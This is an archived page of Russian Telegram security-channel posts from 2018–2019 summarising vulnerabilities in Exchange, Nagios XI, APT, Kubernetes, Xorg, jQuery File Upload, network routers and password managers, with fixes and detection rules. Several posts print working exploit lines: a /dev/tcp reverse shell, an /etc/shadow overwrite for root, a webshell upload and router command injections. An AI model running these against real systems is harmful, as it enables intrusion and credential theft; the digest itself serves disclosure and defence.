Information Hardening

@informhardening Нравится 0
Это ваш канал? Подтвердите владение для дополнительных возможностей

Практическое применение безопасности
@Li11ian
Гео и язык канала
Россия, Русский
Категория
Технологии


Гео канала
Россия
Язык канала
Русский
Категория
Технологии
Добавлен в индекс
28.09.2017 20:30
Последнее обновление
27.05.2019 03:36
реклама
Telegram Analytics
Самые свежие новости сервиса TGStat. Подписаться →
Searchee Bot
Ваш незаменимый помощник в поиске Telеgram-каналов.
@TGStat_Bot
Бот для получения статистики каналов не выходя из Telegram
1 565
подписчиков
~0
охват 1 публикации
~32
дневной охват
N/A
постов в день
N/A
ERR %
2.6
индекс цитирования
Репосты и упоминания канала
11 упоминаний канала
0 упоминаний публикаций
76 репостов
ANTICHAT Channel
ANTICHAT Channel
киберпукан
ANTICHAT Channel
Мамкины Хакеры
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
Hse InfoSec
Админим с Буквой
ANTICHAT Channel
Пятничный деплой
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
Киберпиздец
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
Camshift
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
Админим с Буквой
~/Documents/journal
ANTICHAT Channel
ANTICHAT Channel
ANTICHAT Channel
Каналы, которые цитирует @informhardening
Последние публикации
Удалённые
С упоминаниями
Репосты
если коротко и наглядно
#пароли

Как выбрать и правильно использовать менеджер паролей

...и перестать уже хранить пароли в txt и doc взломщикам на радость.

Ребятки из Independent Security Evaluators запилили опупенно интересную статью о безопасности различных менеджерей паролей. Исследование включало 1Password7, 1Password4, Dashlane, KeePass и LastPass. В результате оказалось, что с защитой данных, когда приложение не запущено, все менеджеры справляются хорошо. А вот когда приложение запущено, в том числе когда база паролей была уже заблокирована после использования (состояние locked), степень реализуемой защиты колеблется от не очень хорошей до очень плохой.

1Password7 (7.2.576)
При введении мастер-пароля расшифровывает сразу все пароли из базы и сохраняет их в оперативной памяти. Также хранит в оперативной памяти в открытом виде мастер-пароль и дополнительный секретный ключ. Все это не удаляется и остается в памяти при переводе в заблокированное состояние.

1Password4 (4.6.2.626)
Хотя это устаревшая версия, ее защита лучше. Она расшифровывает пароли по одному и сохраняет в памяти в открытом виде только те, к которым было обращение. При блокировке эта память освобождается, но не затирается сразу. А вот мастер-пароль хранится в памяти как в разблокированном, так и в заблокированном состоянии, почти в открытом виде - для декодирования необходимо запутстить две функции RtlRunEncodeUnicodeString и RtlRunDecodeUnicodeString.

Dashlane (6.1843.0)
Этот менеджер имеет важную отличительную особенность - при закрытии приложения стандартными методами (нажатие на [x], Alt+F4) он не закрывается (как это делают остальные), а сворачивается в трей.
Dashlane хранит в памяти расшифрованной только последнюю запись, к которой обращался пользователь. Но если пользователь что-то редактировал, то расшифровывается и помещается в память вся база. В обоих случаях расшифрованные данные остаются в памяти и после блокировки - на некоторое время - память освобождается, но не затирается.

KeePass (2.40)
Расшифровывает и сохраняет в памяти записи по мере обращения к ним. После блокировки эти записи остаются в памяти в открытом виде.

LastPass (4.1.59)
Расшифровывает пароли по одному при обращении к ним, но не удаляет эти пароли из памяти при переходе в заблокированное состояние. Мастер-пароль затирает сразу после выработки ключей фразой 'lastpass rocks', но во время выработки ключей мастер-пароль сохраняется в другом буфере в оперативной памяти в открытом виде и так и остается там. Фразу 'lastpass rocks' можно использовать для его легкого поиска после применения strings к дампу памяти - он будет рядом в пределах нескольких строк =)

Так что любой менеджер лучше выключать, а не блокировать. А некоторые еще и мастер-пароль могут спалить.

Источник (с красивыми картинками, примерами, ссылками на материалы, да и вообще читается приятно): https://www.securityevaluators.com/casestudies/password-manager-hacking/
Читать полностью
Information Hardening 20 Feb, 10:33
#exchange #exploit

Подстава от Exchange

В последнее время обсуждается непотребное поведение Exchange: при отправке push-уведомлений (функция PushSubscription) он использует свою привилегированную учетку, потому что в функции BeginSendNotification:

notificationServiceClient.Credentials = CredentialCache.DefaultCredentials;

где CredentialCache.DefaultCredentials выполняется от имени NT AUTHORITY\SYSTEM.

Отправлять push-уведомления можно на любой HTTP-сервер, какой пожелает настроить авторизованный пользователь Exchange. Ну и дальше NTLM-relay с правами сервера Exchange.

Один из вариантов реализации атаки предполагает получение прав любого пользователя Exchange на самом сервере, подробно описан тут: https://www.thezdi.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange, и прилагаются эксплойты, по умолчанию создающие правило перенаправления входящих жертвы на ящик атакующего. От этой атаки (CVE-2018-8581) Microsoft выпустила очумительную рекомендацию по защите:

reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableLoopbackCheck /f

Это спасает только от релея на исходный сервер.

Другой вариант атаки использует релей на другие хосты (DC в частности) и основан на обычно высоких привилегиях Exchange в домене, в том числе наличии прав на операции DCSync. Описание атаки с нюансами: https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/. Прилагается скрипт для провокации Exchange на аутентификацию, а также скрипт для двойного релея, чтобы еще и креды для ящика не нужны были.
Читать полностью
#nagios #exploit #обновления

Целая лаба для школьников

В Nagios XI 5.5.6 выявлена сразу пачка простых и эффективных уязвимостей, среди которых удаленное выполнение произвольного кода с правами юзера apache и повышение привилегий, что в комбинации позволяет получить полный доступ к серверу. Доступна версия Nagios XI 5.5.7, в которой данные дыры устранены.

CVE-2018-15708 - RCE с правами apache. Проблема в Snoopy.class.inc, содержащем такой код:

exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);

где $URI может быть передан через URI запроса к magpie_debug.php, что позволяет модифицировать команду. Например, следующий запрос приведет к сохранению произвольного файла в /usr/local/nagvis/share, откуда он может быть запущен через веб-интерфейс:

https://x.x.x.x/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=https:///%20-o%20/usr/local/nagvis/share/exec.php

CVE-2018-15710 - повышение привилегий через параметр addresses в функции autodiscover_new.php. По умолчанию в /etc/sudoers прописываются разрешения запуска данного скрипта с правами рута и без пароля для юзеров apache и nagios. Пример запуска обратного шелла с повышением:

sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp//4444 0>&1;'

И еще:

CVE-2018-15709 - внедрение команд ОС через веб-интерфейс авторизованным пользователем.

CVE-2018-15711 - повышение привилегий авторизованным пользователем Nagios через переустановку ключей администраторов.

CVE-2018-15712 - хранимая XSS от лица неавторизованного пользователя.

CVE-2018-15713 - хранимая XSS от авторизованного пользователя.

CVE-2018-15714 - отраженная XSS

Описание уязвимостей, пути, параметры, форматы можно посмотреть тут: https://www.tenable.com/security/research/tra-2018-37
Вариант совмещения и автоматизации для первых двух дыр: https://www.exploit-db.com/exploits/46221
Читать полностью
Information Hardening 31 Jan, 10:33
#linux #обновления #exploit

Подделка пакетов в APT

В APT найдена уязвимость, позволяющая подменить пакеты при загрузке по HTTP. Обычно APT проверяет хеши пакетов и их размер по базе метаданных доверенных пакетов, заверенных цифровой подписью. Однако, как оказалось, данную проверку можно обойти. Конечно, у взломщика должен быть доступ к потоку HTTP-трафика.

Для загрузки данных из репозитория APT запускает дочерний процесс. Взаимодействие между родительским и дочерним процессом происходит с помощью обмена текстовыми командами и данными. Когда загрузка завершена, дочерний процесс отправляет сообщение с уже посчитанными хешами и размером пакета подобное такому:
201 URI Done
URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb
Filename: /var/cache/apt/archives/partial/cowsay_3.03+dfsg2-3_all.deb
Size: 20070
Last-Modified: Tue, 17 Jan 2017 18:05:21 +0000
MD5-Hash: 27967ddb76b2c394a0714480b7072ab3
MD5Sum-Hash: 27967ddb76b2c394a0714480b7072ab3
SHA256-Hash: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831
Checksum-FileSize-Hash: 20070

В тех случаях, когда дочерний процесс получает от репозитория редирект HTTP, он передает родительскому сообщение следующего вида:
103 Redirect
URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb
New-URI: http://example.com/new-uri

И значение New-URI тут берется из заголовка Location редиректа HTTP. В нем то и присутствует уязвимость - в него можно включать переносы строк, что позволяет полностью подделать сообщение об успешной загрузке и все хеши в нем. Родительский процесс будет полагаться на эти значения хешей и размера пакета при проверке, хотя по факту был загружен совсем другой пакет.

Проблема получила идентификатор CVE-2019-3462 и исправлена в версии 1.4.9 APT. Обновленная версия уже доступна в репозиториях Ubuntu и Debian.

Статья исследователя, включающая еще размышления на тему отключения редиректов и предпочтения HTTPS: https://justi.cz/security/2019/01/22/apt-rce.html
Читать полностью
Information Hardening 23 Jan, 10:01
#soft #обновления #конфигурация

Неприятности с различными клиентами SCP

Несколько новых уязвимостей в самых распространенных реализациях клиента SCP (особо важно для тех, кто часто подключается к чужим серверам):
CVE-2019-6111 - присутствует в OpenSSH scp
Information Hardening 15 Jan, 11:25
#windows #soft #exploit

В то время, как критичный софт обновляется сам

Еще в конце прошлого года была опубликована информация об уязвимостях в некоторых драйверах ASUS и GIGABYTE. Уязвимости позволяют локально повысить привилегии до полного доступа к системе.

Перечень известных приложений, включающих уязвимые драйвера:
- ASUS Aura Sync v1.07.22 и раньше, а также более поздние версии, в которых исправлена только часть уязвимостей
- GIGABYTE APP Center v1.05.21 и раньше
- AORUS GRAPHICS ENGINE v1.33 и раньше
- XTREME GAMING ENGINE v1.25 и раньше
- OC GURU II v2.08

Проверить наличие уязвимых драйверов:

driverquery /V | findstr /I /C:GPCIDrv /C:GDrv /C:GLCKIo /C:Asusgio

Проверить наличие проблемных приложений:

wmic product get name | findstr /I /C:"ASUS Aura Sync" /C:"GIGABYTE APP Center" /C:"AORUS GRAPHICS ENGINE" /C:"XTREME GAMING ENGINE" /C:"OC GURU"

Выпуск исправлений дается тяжело: ASUS продвигается в устранении дыр, но постепенно, а GIGABYTE утверждает, что он хардварная компания, не особо то занимается софтом, а заявленных уязвимостей в их продуктах нет.

Описание уязвимостей и коды PoC от ресечеров: https://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities, https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities
Читать полностью
Information Hardening 19 Dec 2018, 11:04
#wifi #linux #обновления

Обновление от KRACK

Спустя два года после предыдущей версии 2.6 выпущена версия wpa_supplicant 2.7, в которой устранены уязвимости к атаке KRACK: CVE-2017-13077, CVE-2017-13078, CVE-2017-13079, CVE-2017-13080, CVE-2017-13081, CVE-2017-13082, CVE-2017-13086, CVE-2017-13087, CVE-2017-13088, а также уязвимость CVE-2018-14526, позволяющая получить ключ EAPOL в сетях, использующих WPA2 с TKIP.

Другие основные изменения, касающиеся безопасности:
- Добавлен ряд новых функций:
- аутентификация по общему ключу FILS (Fast Initial Link Setup, стандартизирован как IEEE 802.11ai),
- OWE (Opportunistic Wireless Encryption, RFC 8110, используется в WPA3),
- DPP (Wi-Fi Device Provisioning Protocol, используется в WPA3)
- В SAE теперь можно использовать отдельный от WPA2 пароль (требуется, чтобы и точка доступа это поддерживала)
- Добавлена поддержка OpenSSL 1.1.1 и wolfSSL
- Удален весь функционал PeerKey (был подвержен атаке KRACK)
- Различные улучшения доступных криптоалгоритмов: RSA 3072-бит с 192-битной криптографией NSA Suite B, SHA256 в OCSP, SHA384, BIP-CMAC-256, BIP-GMAC-128, BIP-GMAC-256 в FT (Fast Transition, IEEE 802.11r)
- Опция ap_isolate для изоляции клиентов в режиме точки доступа (AP mode)

Вместе выпушена версия 2.7 hostapd с неменьшим расширением функционала и устранением уязвимости к атаке KRACK. Более подробный перечень изменений: http://lists.infradead.org/pipermail/hostap/2018-December/039069.html

В репозитории Debian, например, обновки уже доступны в ветке experimental.
Читать полностью
Information Hardening 11 Dec 2018, 10:52
#kubernetes #exploit #обновления

Первая критическая уязвимость в Kubernetes

Жутковатая дыра CVE-2018-1002105: после отправки через API запросов не закрывается сетевое соединение. Например, можно отправить discovery-запрос. После этого отправленные через API запросы будут восприняты бэкенд-сервисами как внутренние запросы от сервера API, отправленные с использованием параметров аутентификации сервера API. В результате можно проводить многие операции с бэкендом, в том числе выполнить произвольный код. По умолчанию discovery-запросы доступны даже неавторизованным пользователям, что можно отключить опцией "--anonymous-auth=false".

Проблема в обратном прокси в фронтенде Kubernetes. Когда он осуществляет процедуру открытия вебсокета, то не проверяет ответ сервера и создает соединение даже при ответе 404. Клиенту при этом придет 404, но соединение все равно будет открыто. Причем прокси осуществляет аутентификацию собственными кредами, чего достаточно для многих операций бэкендов даже без собственной авторизации пользователя.

Проблема исправлена в версиях 1.10.11, 1.11.5, 1.12.3 и новом выпуске 1.13.

Подробное описание бага: https://rancher.com/blog/2018/2018-12-04-k8s-cve/
Пример эксплойта: https://github.com/evict/poc_CVE-2018-1002105
Читать полностью
Information Hardening 4 Dec 2018, 11:07
#network #конфигурация

Защита от атак по IPv6

Сигнатуры детекта подмены DHCPv6 и адреса WPAD через DNS/IPv6 для Snort и Suricata от Fox-IT Security Research Team:

# Snort & Suricata signatures for:
# https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6
alert udp fe80::/12 [546,547] -> fe80::/12 [546,547] (msg:"FOX-SRT - Policy - DHCPv6 advertise"; content:"|02|"; offset:48; depth:1; reference:url,blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/; threshold:type limit, track by_src, count 1, seconds 3600; classtype:policy-violation; sid:21002327; rev:2;)
alert udp ::/0 53 -> any any (msg:"FOX-SRT - Suspicious - WPAD DNS reponse over IPv6"; byte_test:1,&,0x7F,2; byte_test:2,>,0,6; content:"|00 04|wpad"; nocase; fast_pattern; threshold: type limit, track by_src, count 1, seconds 1800; reference:url,blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/; classtype:attempted-admin; priority:1; sid:21002330; rev:1;)

Но это всего лишь пара атак. Куда эффективней и надежней целиком отключить IPv6. Вы же им не пользуетесь в самом деле?

Отключается в параметре SYSTEM\CurrentControlSet\services\TCPIP6\Parameters:DisabledComponents, все отключено - 0xFFFFFFFF (REG_DWORD).
Для групповых политик потребуются дополнительные шаблоны. Готовые есть, например, тут: http://sysadminreference.blogspot.com/2014/01/how-to-disable-ipv6-in-windows-vista.html
Читать полностью
Information Hardening 30 Nov 2018, 10:08
#вредонос #конфигурация

Троян в зависимостях js-библиотеки

В одном из релизов (3.3.6) популярной js-библиотеки event-stream была установлена вредоносная зависимость: пакет flatmap-stream 0.1.1. Сама event-stream является зависимостью для ps-tree и npm-run-all и еще нескольких тысяч npm-пакетов.

Проверить наличие проблемы в своей системе можно легко командой:

npm ls event-stream flatmap-stream

Также разработчикам приложений рекомендуют пока зафиксировать в зависимостях версию event-stream 3.3.4, поскольку в сентябре предыдущий автор библиотеки передал управление новому (right9ctrl), после чего и появилась указанная вредоносная зависимость. На данный момент она удалена из зависимостей, а релиз 3.3.6 отозван из NPM.

Вредоносный код во flatmap-stream использовался для кражи закрытых ключей от кошельков Copay, которые отправлялись на copayapi.host и 111.90.151.134.
Читать полностью
Information Hardening 27 Nov 2018, 10:19
#windows #exploit #обновления

Windows LPE CVE-2018-8550

Свежее повышение привилегий в Windows из-за ряда недостатков безопасности в DfMarshal (COM Aggregate Marshaler).
Несколько примеров эксплуатации для Windows 10 1803 раскрываются тут, как и основное описание: https://bugs.chromium.org/p/project-zero/issues/detail?id=1644
И так как проблем несколько, еще дополнительные описания для тех, кому интересны подробности: https://bugs.chromium.org/p/project-zero/issues/detail?id=1645, https://bugs.chromium.org/p/project-zero/issues/detail?id=1646, https://bugs.chromium.org/p/project-zero/issues/detail?id=1647, https://bugs.chromium.org/p/project-zero/issues/detail?id=1648.

Весь набор проблем лечится единым фиксом и получил общий идентификатор CVE-2018-8550. Хотя примеры эксплойтов приведены для Windows 10, уязвимости присутствуют и в других версиях: Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

Исправления выпущены, перечень KB: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8550
Читать полностью
Information Hardening 20 Nov 2018, 08:15
#linux #exploit #update

Linux Kernel CVE-2018-18955

Интересное повышение привилегий через нэймспейсы и вложенные нэймспейсы из-за недообработки отображений UID/GID, когда их больше пяти. Подробное описание, скрипты для эксплуатации и ее пример: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712

Проблема появилась в версии ядра 4.15 и устранена в выпусках 4.18.19 и 4.19.2:
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.19
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2
Читать полностью
Information Hardening 8 Nov 2018, 10:35
#virtualbox #конфигурация #exploit

Учись сражаться за дело рабочего класса!

Итак, вчера мы имеем раскрытие зиродея в VirtualBox, которое не просто раскрытие, а показательный шаг в борьбе ресечеров с неадекватными условиями багбаунти. Подробно претензии ресечара можно почитать тут: https://github.com/MorteNoir1/virtualbox_e1000_0day

Уязвимость повзоляет обойти изоляцию гостевых машин и выполнить код на хостовой системе. Присутствует в последней версии VirtualBox 5.2.20 и более ранних. Патча пока нет, но можно защититься конфигурационно.

Корень проблемы в переполнении буфера в коде эмуляции сетевого адаптера Intel PRO/1000 MT Desktop, который устанавливается в настройках виртуальных машин по умолчанию. Также для проведения атаки требуется режим NAT. Соответственно, если изменить тип адаптера (на PCnet или Paravirtualized Network) или изменить режим NAT на другой - данная атака будет неактуальна.

Уязвимость проявляется независимо от операционных систем, используемых на стороне хоста и гостевого окружения. Эксплуатация уязвимости требует прав root или администратора на гостевой машине и позволяет выполнить код с правами процесса VirtualBox на хостовой системе.

Очень подробное описание уязвимости и процесса экплуатации с кодом: https://github.com/MorteNoir1/virtualbox_e1000_0day
Читать полностью
Information Hardening 2 Nov 2018, 10:35
#windows #exploit

Хватит уже Qwerty

Active Directory Federated Services позволяет перебирать пользователей. Определять, существует ли пользователь, по времени ответа. Microsoft пока вроде не согласился, что это уязвимость. И включение в CVE на рассмотрении. Но наверно включат. И мы то понимаем, какой риск получения пароля, если у атакующего в наличии большой пул учеток.

Разница в задержке ответа сервера для существующих и несуществующих учеток значительна, впрочем это зависит от размера базы пользователей. Так что нужно сначала замерить время ответа для заведомо существующей и несуществующей учеток. Источник, пример и подробное описание незамысловатого действа: https://github.com/binary1985/VulnerabilityDisclosure/blob/master/ADFS-Timing-Attack

Пока нет исправления, такие вот дела. Лишний повод напомнить юзерам про сложность паролей.
Читать полностью
Information Hardening 30 Oct 2018, 12:04
#linux #exploit #обновления #конфигурация

В твиттере плохому не научат

Быстро набравшая популярность уязвимость CVE-2018-14665 в X.Org Server позволяет повысить привилегии и перезаписывать произвольные файлы. Проблема актуальна только если у Xorg установлен бит setuid. В разных средах он по умолчанию установлен или не установлен.

Если же setuid установлен, то играет роль недостаточная проверка безопасности параметров -modulepath и -logfile. Первый позволяет подключить произвольный модуль, который выполнится с повышенными привилегиями. Второй - перезаписывать произвольные файлы. Параметр -fp позволяет указать путь к шрифтам, который будет тут же записан в логфайл. Отсюда первый, "базовый" вариант эксплойта с перезаписью shadow:

cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su

Другой, без испоганивания shadow, с открытием привилегированного шелла через ld-linux.so: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850

Проблема родилась в версии 1.19.0 и исправлена в 1.20.3. При недоступности обновления для конкретной сборки рекомендуется отключить SUID-бит, имея в виду, что это может привести к ошибкам при запуске через xinit или startx.
Читать полностью
Information Hardening 24 Oct 2018, 11:15
#веб #exploit #обновления

jQuery File (maybe Shell) Upload

Жили-жили и вот те раз. С 2015 года юзают уязвимость, а комьюнити как бы не в теме.

Речь конечно про загрузку произвольных файлов в jQuery File Upload, в том числе .php с возможностью исполнения (CVE-2018-9206).

jQuery-плагин jQuery File Upload обеспечивает виджет для загрузки файлов на сайты, поддерживающий групповую загрузку, индикатор прогресса и возобновление прерванных загрузок. Прилагается также набор примеров серверных обработчиков для сохранения отправляемых файлов. Так вот эти обработчики никак не проверяют тип загружаемого файла. Файл сохраняется с заданным пользователем именем в директории ./files и в общем случае доступен для запроса.

В составе плагина предусмотрен .htaccess, который должен ограничивать выполнение .php файлов директивами SetHandler default-handler, ForceType application/octet-stream. Однако это будет работать только при соответствующих разрешениях в AllowOverride (FileInfo) и активном модуле mod_headers.

Так как плагин очень популярен, проблема расползлась по огромному множеству приложений и форков с некоторыми модификациями, но чаще без. Тут https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206 доступен скрипт, который проверяет наличие уязвимости в трех наиболее распространенных вариациях, ну и шелл пытается загрузить, для надежности проверки.

В базом варианте загрузка элементарная:

curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php

Уязвимость исправлена в версии 9.22.1 (и 9.24.1, но там все немного по другому) - добавлено ограничение типов загружаемых файлов и теперь по умолчанию можно загружать только GIF, JPEG и PNG.
Читать полностью
Information Hardening 19 Oct 2018, 11:23
#network #exploit #обновления #уязвимости

Коллекция проблем с сетевым оборудованием за последние пару недель

D-Link
Обход директорий (CVE-2018-10822), хранение паролей в открытом виде (CVE-2018-10824) и внедрение команд (CVE-2018-10823). Уязвимые версии: DWR-116 до 1.06, DIR-140L до 1.02 (кроме 2018-10823), DIR-640L до 1.02 (кроме 2018-10823), DWR-512 до 2.02, DWR-712 до 2.02, DWR-912 до 2.02, DWR-921 до 2.02, DWR-111 до 1.01.

Первые две позволяют получить пароль из файла /tmp/XXX/0:
curl http://routerip/uir//tmp/XXX/0

Внедрение команд:
curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd

Подробнее:https://seclists.org/fulldisclosure/2018/Oct/36

И еще уязвимости в D-Link Central WiFiManager:
CVE-2018-17440 - учетка admin/admin в FTP-сервере на порту 9000
CVE-2018-17441 - XSS
CVE-2018-17442 - выполнение PHP-кода через загрузку архивов RAR
CVE-2018-17443 - XSS

Эти исправлены в версии Central WiFiManager 1.03R0100-Beta1.

Mikrotik
Новый эксплойт для CVE-2018-14847 - получение рутового доступа: https://cxsecurity.com/issue/WLB-2018100099

И еще ряд уязвимостей:
CVE-2018-1156 - возможность выполнения произвольного кода на устройстве при наличии аутентифицированного доступа
CVE-2018-1157 - DoS-атака через исчерпание всей доступной памяти при загрузке файла
CVE-2018-1158 - переполнение стека при рекурсивном разборе запросов
CVE-2018-1159 - выход за допустимые границы буфера в реализации http-сервера

Уязвимости исправлены в версиях RouterOS 6.40.9, 6.42.7 и 6.43.

TP-Link
Три новых уязвимости в TP-Link TL-WR841N:
CVE-2018-15700 - отказ в обслуживании httpd сервиса в результате HTTP-запроса из локальной сети с пустым Referer
CVE-2018-15701 - отказ в обслуживании httpd сервиса в результате HTTP-запроса с заголовком Cookie вида 'Cookie: Authorization;'
CVE-2018-15702 - возможность CSRF в результате неполной проверки Referer (проверяются только первые несколько символов)

Последняя уязвимость комбинируется со "старой" CVE-2018-11714 - возможность обращения к CGI-скриптам без прохождения аутентификации при установке в Referer значения, свидетельствующего о переходе с хостов "tplinkwifi.net", "tplinklogin.net" или с IP-адреса текущего маршрутизатора. Можно получить конфигурацию, изменять ее параметры, сменить пароль для WiFi. Примеры эксплуатации: https://www.exploit-db.com/exploits/44781/. CVE-2018-15702 позволяет выполнять это через CSRF.

Для этих уязвимостей, в том числе CVE-2018-11714, патчи все еще не выпущены. CVE-2018-11714 также присутствует в TL-WR840N.

Junos OS
Исправлено много уязвимостей: CVE-2018-7173, CVE-2018-7170, CVE-2018-7172, CVE-2018-7174, CVE-2018-7175, CVE-2016-1549, CVE-2018-0062, CVE-2018-0061, CVE-2018-0060, CVE-2018-0057, CVE-2018-0055, CVE-2018-0054, CVE-2018-0053, CVE-2018-0052, CVE-2018-0051, CVE-2018-0050, CVE-2018-0047, CVE-2018-0045, CVE-2018-0043, CVE-2018-0049, CVE-2018-0048, CVE-2018-0003, CVE-2018-0046, CVE-2017-15906, CVE-2016-10012, CVE-2016-10011, CVE-2016-10010, CVE-2016-10009. Некоторые из них позволяют получить доступ или выполнить код при особых конфигурациях или дополнительных действиях. Подробности можно посмотреть тут: https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES
Читать полностью
Information Hardening 18 Oct 2018, 11:13
#libssh #обновление #exploit

Говорят, это смешно. Похоже на то

Очень модно нынче про libssh писать. Там с версии 0.6 унифицировали код клиента и сервера, и в сервер перекочевал функционал считать аутентификацию успешной после сообщения SSH2_MSG_USERAUTH_SUCCESS. Теперь клиенту достаточно отправить это сообщение вместо запроса на аутентификацию, чтобы получить доступ.

Уязвимость получила номер CVE-2018-10933. Исправление добавлено в выпуски 0.8.4 и 0.7.6.

libssh чаще используется для реализации клиентской стороны, а не серверной, поэтому уязвимых серверов не так уж и много. Один из значимых продуктов, где libssh используется для сервера, - GitHub Enterprise - не подвержен уязвимости, так как libssh в нем модифицирована.

Ну и скрипт для проверки наличия уязвимости, он же PoC, открывающий шелл при успешной "эксплуатации": https://www.openwall.com/lists/oss-security/2018/10/17/5
Читать полностью
Information Hardening 16 Oct 2018, 11:26
Техподдержка импервы местами ведет в никуда. Я даже было подумала, что она только для избранных, но нет, она есть: https://www.imperva.com/Services/TechnicalSupport